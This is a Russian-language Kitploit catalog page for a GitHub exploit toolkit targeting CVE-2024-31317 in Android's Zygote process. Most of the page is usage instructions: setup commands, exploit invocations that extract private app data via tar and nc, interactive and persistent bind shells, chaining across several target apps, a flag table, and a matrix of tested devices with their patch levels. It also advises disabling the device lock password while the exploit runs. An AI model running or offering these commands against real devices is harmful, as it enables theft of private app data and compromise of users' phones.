Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
zygote-CVE-2024-31317 — Это набор инструментов, который использует CVE-2024-31317 для извлечения приватных данных приложений через ADB или запуска оболочки с UID приложения. | Kitploit
Инструменты/GitHubGitHub/vnescape/zygote-cve-2024-31317
Безопасность AndroidАнализ уязвимостейЭксплуатацияЭксфильтрация данныхТестирование на ПроникновениеМобильная безопасность
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

Это набор инструментов, который использует CVE-2024-31317 для извлечения приватных данных приложений через ADB или запуска оболочки с UID приложения.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3123 месяцев назадЕщё не проверено

Zygote Toolkit - CVE-2024-31317

Это набор инструментов, использующий CVE-2024-31317 для извлечения приватных данных приложений через ADB или запуска оболочки с UID приложения. Уязвимость затрагивает Android версий с 9 по 14 с уровнем патча безопасности 2024-06-01 или ниже. Матрица поддержки протестированных устройств приведена ниже.

Предварительные требования

Debian/Ubuntu (системные пакеты)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

Добавьте строки export в ~/.bashrc (или эквивалент) для постоянного применения.

Проверка

root@kitploit:~
./setup.sh

Быстрый старт

root@kitploit:~
# Build and install the carrier APK (auto-builds from source)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# Extract an app's data directory
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

Эксплойт собирает всё из Hijack.java и AndroidManifest.xml при первом запуске.

Использование

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

Режимы

Параметры

Примеры

root@kitploit:~
# Extraction
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# Check if device is vulnerable
python3 cve_2024_31317.py -d DEVICE --check-vuln

# Interactive bind shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# Persistent shell on port 7777
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# Multi-app chain
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# Recovery only (fix boot loop)
python3 cve_2024_31317.py -d DEVICE --recover

Сборка из исходников

Всё собирается из исходников во время выполнения. Конвейер сборки использует javac (JDK 17+), d8, aapt, zipalign и apksigner из Android SDK.

  • x86_64 → arm64: инструменты работают нативно; DEX-вывод не зависит от архитектуры
  • ARM64 → arm64: всё работает нативно (Adoptium предоставляет ARM64-сборки JDK)

Пароль блокировки

Если на устройстве установлен пароль блокировки, оно запускается в состоянии BFU (Before First Unlock, до первой разблокировки). Эксплойт опрашивает sys.user.0.ce_available до 5 минут, пока вы не разблокируете устройство. Рекомендуется отключить пароль блокировки на время выполнения эксплойта.

Протестированные устройства

† Специфика Samsung One UI: инъекция ZNJECT проходит успешно, извлечение с помощью -E работает, но bind shell ServerSocket на toybox nc так и не открывается. Требуется дальнейшее исследование, чтобы найти корневую причину проблемы.

Восстановление

Оставшаяся в hidden_api_blacklist_exemptions полезная нагрузка может вызвать цикл загрузки (boot loop) при следующей перезагрузке. Запустите --recover для сброса:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
Скачать инструмент
ФлагОписание
-EИзвлечение данных приложения через tar | nc во внучатом процессе (переживает завершение родительского процесса)
-iИнтерактивный REPL bind shell
-S PORTПостоянная оболочка (FIFO-протокол с одним портом)
--recoverСброс настройки, исправление зависания при загрузке / деградации Zygote
--setupСобрать + установить только carrier APK (без инъекции)
--list-appsСписок всех установленных пакетов с UID и типом sys/user
--check-vulnПроверить, уязвимо ли устройство к CVE-2024-31317, и выйти
ФлагОписание
-o file.tarПуть к выходному tar-архиву извлечения
-y / --yesПропускать запросы подтверждения
--retries NМаксимальное число повторов для цели (по умолчанию 3)
--chain-targets "pkg1,pkg2"Извлечь несколько приложений за один сеанс
--chain-file file.jsonТо же, что выше, из JSON-файла
--reboot-afterПерезагрузка после извлечения (восстанавливает Zygote)
--reboot-every NПерезагрузка после каждых N целей цепочки
--coldПропустить прогрев; сохранить полезную нагрузку для следующего запуска приложения
--port PORTПорт bind shell (по умолчанию 8888)
-d SERIALВыбрать конкретное устройство (при нескольких подключённых)
--rebuildПринудительная пересборка carrier APK
УстройствоAndroidAPIПатчABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnОценка
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (emulator)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12